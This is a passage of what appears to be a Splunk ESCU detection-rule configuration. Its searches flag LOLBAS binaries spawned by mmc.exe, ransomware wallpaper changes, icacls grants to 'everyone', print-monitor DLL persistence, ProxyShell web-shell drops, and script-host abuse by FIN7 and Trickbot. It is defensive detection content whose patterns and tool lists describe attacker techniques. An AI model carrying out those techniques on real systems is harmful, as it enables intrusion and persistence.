realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=mmc.exe) (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe", "Rasautou.exe", "Schtasks.exe", "Xwizard.exe", "Dllhost.exe", "Pnputil.exe", "Atbroker.exe", "Pcwrun.exe", "Ttdinject.exe","Mshta.exe", "Bitsadmin.exe", "Certoc.exe", "Ieexec.exe", "Microsoft.Workflow.Compiler.exe", "Runscripthelper.exe", "Forfiles.exe", "Msbuild.exe", "Register-cimprovider.exe", "Tttracer.exe", "Ie4uinit.exe", "Bash.exe", "Hh.exe", "SettingSyncHost.exe", "Cmstp.exe", "Mmc.exe", "Stordiag.exe", "Scriptrunner.exe", "Odbcconf.exe", "Extexport.exe", "Msdt.exe", "WorkFolders.exe", "Diskshadow.exe", "Mavinject.exe", "Regasm.exe", "Gpscript.exe", "Rundll32.exe", "Regsvr32.exe", "Msiexec.exe", "Wuauclt.exe", "Presentationhost.exe", "Wmic.exe", "Runonce.exe", "Syncappvpublishingserver.exe", "Verclsid.exe", "Infdefaultinstall.exe", "Explorer.exe", "Installutil.exe", "Netsh.exe", "Wab.exe", "Dnscmd.exe", "At.exe", "Pcalua.exe", "Msconfig.exe")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mmc_lolbas_execution_process_spawn_filter` [ESCU - Modification Of Wallpaper - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies suspicious modification of registry to deface or change the wallpaper of a compromised machines as part of its payload. This technique was commonly seen in ransomware like REVIL where it create a bitmap file contain a note that the machine was compromised and make it as a wallpaper. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1491"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies suspicious modification of registry to deface or change the wallpaper of a compromised machines as part of its payload. This technique was commonly seen in ransomware like REVIL where it create a bitmap file contain a note that the machine was compromised and make it as a wallpaper. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the Image, TargetObject registry key, registry Details from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = 3rd party tool may used to changed the wallpaper of the machine action.escu.creation_date = 2021-06-02 action.escu.modification_date = 2021-06-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Modification Of Wallpaper - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware", "BlackMatter Ransomware", "Windows Registry Abuse", "Brute Ratel C4", "LockBit Ransomware", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Wallpaper modification on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Modification Of Wallpaper - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware", "BlackMatter Ransomware", "Windows Registry Abuse", "Brute Ratel C4", "LockBit Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1491"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies suspicious modification of registry to deface or change the wallpaper of a compromised machines as part of its payload. This technique was commonly seen in ransomware like REVIL where it create a bitmap file contain a note that the machine was compromised and make it as a wallpaper. action.notable.param.rule_title = Modification Of Wallpaper action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode =13 (TargetObject IN ("*\\Control Panel\\Desktop\\Wallpaper","*\\Control Panel\\Desktop\\WallpaperStyle") AND Image != "*\\explorer.exe") OR (TargetObject IN ("*\\Control Panel\\Desktop\\Wallpaper","*\\Control Panel\\Desktop\\WallpaperStyle") AND Details IN ("*\\temp\\*", "*\\users\\public\\*")) | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Image TargetObject Details Computer process_guid process_id user_id | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `modification_of_wallpaper_filter` [ESCU - Modify ACL permission To Files Or Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies suspicious modification of ACL permission to a files or folder to make it available to everyone. This technique may be used by the adversary to evade ACLs or protected files access. This changes is commonly configured by the file or directory owner with appropriate permission. This behavior is a good indicator if this command seen on a machine utilized by an account with no permission to do so. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies suspicious modification of ACL permission to a files or folder to make it available to everyone. This technique may be used by the adversary to evade ACLs or protected files access. This changes is commonly configured by the file or directory owner with appropriate permission. This behavior is a good indicator if this command seen on a machine utilized by an account with no permission to do so. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = administrators may use this command. Filter as needed. action.escu.creation_date = 2022-03-17 action.escu.modification_date = 2022-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Modify ACL permission To Files Or Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig"] action.risk = 1 action.risk.param._risk_message = Suspicious ACL permission modification on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 32}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Modify ACL permission To Files Or Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig"], "cis20": ["CIS 10"], "confidence": 80, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "cacls.exe" OR Processes.process_name = "icacls.exe" OR Processes.process_name = "xcacls.exe") AND Processes.process = "*/G*" AND (Processes.process = "* everyone:*" OR Processes.process = "* SYSTEM:*" OR Processes.process = "* S-1-1-0:*") by Processes.parent_process_name Processes.process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `modify_acl_permission_to_files_or_folder_filter` [ESCU - Monitor Registry Keys for Print Monitors - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for registry activity associated with modifications to the registry key `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name to the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions and will persist after reboot. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.010", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for registry activity associated with modifications to the registry key `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name to the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions and will persist after reboot. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = You will encounter noise from legitimate print-monitor registry entries. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Monitor Registry Keys for Print Monitors - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Windows Registry Activities", "Windows Persistence Techniques", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = New print monitor added on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Monitor Registry Keys for Print Monitors - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Windows Registry Activities", "Windows Persistence Techniques", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.010", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for registry activity associated with modifications to the registry key `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. In this scenario, an attacker can load an arbitrary .dll into the print-monitor registry by giving the full path name to the after.dll. The system will execute the .dll with elevated (SYSTEM) permissions and will persist after reboot. action.notable.param.rule_title = Monitor Registry Keys for Print Monitors action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.action=modified AND Registry.registry_path="*CurrentControlSet\\Control\\Print\\Monitors*") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `monitor_registry_keys_for_print_monitors_filter` [ESCU - MS Exchange Mailbox Replication service writing Active Server Pages - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. The analytic is limited to process name MSExchangeMailboxReplication.exe, which typically does not write .aspx files to disk. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1505", "T1505.003", "T1190", "T1133"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. The analytic is limited to process name MSExchangeMailboxReplication.exe, which typically does not write .aspx files to disk. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node and `Filesystem` node. action.escu.known_false_positives = The query is structured in a way that `action` (read, create) is not defined. Review the results of this query, filter, and tune as necessary. It may be necessary to generate this query specific to your endpoint product. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - MS Exchange Mailbox Replication service writing Active Server Pages - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["ProxyShell", "Ransomware", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = A file - $file_name$ was written to disk that is related to IIS exploitation related to ProxyShell. Review further file modifications on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"risk_object_field": "file_name", "risk_object_type": "other", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - MS Exchange Mailbox Replication service writing Active Server Pages - Rule action.correlationsearch.annotations = {"analytic_story": ["ProxyShell", "Ransomware", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1505", "T1505.003", "T1190", "T1133"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. The analytic is limited to process name MSExchangeMailboxReplication.exe, which typically does not write .aspx files to disk. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant. action.notable.param.rule_title = MS Exchange Mailbox Replication service writing Active Server Pages action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=MSExchangeMailboxReplication.exe by _time span=1h Processes.process_id Processes.process_name Processes.process_guid Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\HttpProxy\\owa\\auth\\*", "*\\inetpub\\wwwroot\\aspnet_client\\*", "*\\HttpProxy\\OAB\\*") Filesystem.file_name="*.aspx" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process process_guid] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `ms_exchange_mailbox_replication_service_writing_active_server_pages_filter` [ESCU - MS Scripting Process Loading Ldap Module - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious MS scripting process such as wscript.exe or cscript.exe that loading ldap module to process ldap query. This behavior was seen in FIN7 implant where it uses javascript to execute ldap query to parse host information that will send to its C2 server. this anomaly detections is a good initial step to hunt further a suspicious ldap query or ldap related events to the host that may give you good information regarding ldap or AD information processing or might be a attacker. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious MS scripting process such as wscript.exe or cscript.exe that loading ldap module to process ldap query. This behavior was seen in FIN7 implant where it uses javascript to execute ldap query to parse host information that will send to its C2 server. this anomaly detections is a good initial step to hunt further a suspicious ldap query or ldap related events to the host that may give you good information regarding ldap or AD information processing or might be a attacker. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used. action.escu.known_false_positives = automation scripting language may used by network operator to do ldap query. action.escu.creation_date = 2021-09-13 action.escu.modification_date = 2021-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - MS Scripting Process Loading Ldap Module - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["FIN7"] action.risk = 1 action.risk.param._risk_message = $process_name$ loading ldap modules $ImageLoaded$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MS Scripting Process Loading Ldap Module - Rule action.correlationsearch.annotations = {"analytic_story": ["FIN7"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode =7 Image IN ("*\\wscript.exe", "*\\cscript.exe") ImageLoaded IN ("*\\Wldap32.dll", "*\\adsldp.dll", "*\\adsldpc.dll") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_ldap_module_filter` [ESCU - MS Scripting Process Loading WMI Module - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious MS scripting process such as wscript.exe or cscript.exe that loading wmi module to process wmi query. This behavior was seen in FIN7 implant where it uses javascript to execute wmi query to parse host information that will send to its C2 server. this anomaly detections is a good initial step to hunt further a suspicious wmi query or wmi related events to the host that may give you good information regarding process that are commonly using wmi query or modules or might be an attacker using this technique. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious MS scripting process such as wscript.exe or cscript.exe that loading wmi module to process wmi query. This behavior was seen in FIN7 implant where it uses javascript to execute wmi query to parse host information that will send to its C2 server. this anomaly detections is a good initial step to hunt further a suspicious wmi query or wmi related events to the host that may give you good information regarding process that are commonly using wmi query or modules or might be an attacker using this technique. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used. action.escu.known_false_positives = automation scripting language may used by network operator to do ldap query. action.escu.creation_date = 2021-09-13 action.escu.modification_date = 2021-09-13 action.escu.confidence = high action.escu.full_search_name = ESCU - MS Scripting Process Loading WMI Module - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["FIN7"] action.risk = 1 action.risk.param._risk_message = $process_name$ loading wmi modules $ImageLoaded$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MS Scripting Process Loading WMI Module - Rule action.correlationsearch.annotations = {"analytic_story": ["FIN7"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode =7 Image IN ("*\\wscript.exe", "*\\cscript.exe") ImageLoaded IN ("*\\fastprox.dll", "*\\wbemdisp.dll", "*\\wbemprox.dll", "*\\wbemsvc.dll" , "*\\wmiutils.dll", "*\\wbemcomn.dll") | stats min(_time) as firstTime max(_time) as lastTime count by Image EventCode process_name ProcessId ProcessGuid Computer ImageLoaded | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ms_scripting_process_loading_wmi_module_filter` [ESCU - MSBuild Suspicious Spawned By Script Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious child process of MSBuild spawned by Windows Script Host - cscript or wscript. This behavior or event are commonly seen and used by malware or adversaries to execute malicious msbuild process using malicious script in the compromised host. During triage, review parallel processes and identify any file modifications. MSBuild may load a script from the same path without having command-line arguments. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127.001", "T1127"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious child process of MSBuild spawned by Windows Script Host - cscript or wscript. This behavior or event are commonly seen and used by malware or adversaries to execute malicious msbuild process using malicious script in the compromised host. During triage, review parallel processes and identify any file modifications. MSBuild may load a script from the same path without having command-line arguments. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as developers do not spawn MSBuild via a WSH. action.escu.creation_date = 2021-10-04 action.escu.modification_date = 2021-10-04 action.escu.confidence = high action.escu.full_search_name = ESCU - MSBuild Suspicious Spawned By Script Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution MSBuild"] action.risk = 1 action.risk.param._risk_message = Msbuild.exe process spawned by $parent_process_name$ on $dest$ executed by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MSBuild Suspicious Spawned By Script Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution MSBuild"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127.001", "T1127"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious child process of MSBuild spawned by Windows Script Host - cscript or wscript. This behavior or event are commonly seen and used by malware or adversaries to execute malicious msbuild process using malicious script in the compromised host. During triage, review parallel processes and identify any file modifications. MSBuild may load a script from the same path without having command-line arguments. action.notable.param.rule_title = MSBuild Suspicious Spawned By Script Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("wscript.exe", "cscript.exe") AND `process_msbuild` by Processes.dest Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `msbuild_suspicious_spawned_by_script_process_filter` [ESCU - Mshta spawning Rundll32 OR Regsvr32 Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious mshta.exe process that spawn rundll32 or regsvr32 child process. This technique was seen in several malware nowadays like trickbot to load its initial .dll stage loader to execute and download the the actual trickbot payload. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious mshta.exe process that spawn rundll32 or regsvr32 child process. This technique was seen in several malware nowadays like trickbot to load its initial .dll stage loader to execute and download the the actual trickbot payload. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = limitted. this anomaly behavior is not commonly seen in clean host. action.escu.creation_date = 2021-07-19 action.escu.modification_date = 2021-07-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Mshta spawning Rundll32 OR Regsvr32 Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trickbot", "IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = a mshta parent process $parent_process_name$ spawn child process $process_name$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Mshta spawning Rundll32 OR Regsvr32 Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = 